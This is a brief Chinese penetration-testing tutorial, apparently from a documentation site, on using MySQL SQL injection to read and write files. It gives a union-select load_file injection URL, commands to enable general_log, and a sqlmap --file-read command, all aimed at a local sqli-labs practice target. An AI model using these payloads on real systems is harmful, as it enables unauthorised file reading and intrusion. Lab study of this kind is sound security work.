多应用+插件架构,代码干净,二开方便,首家独创一键云编译技术,文档视频完善,免费商用码云13.8K 广告
![](https://img.kancloud.cn/41/e0/41e066af9a6c25a24868d9667253ec98_1241x333.jpg) ***** ## MySQL注入读写文件 MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行 对文件进行读写(前提是权限足够) <br>读取前提: 1.用户权限足够高,尽量具有root权限 2.secure\_file\_priv不为null ### 读取文件内容 ``` http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('D:\\1.txt'),3 --+ ``` ### 开启MySQL文件写入 ``` show variables like '%general%'; # 默认是关闭的 set global general\_log = on; ``` ### 利用sqlmap进行读写文件 ``` python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --file-read "D:\\\\1.txt" ```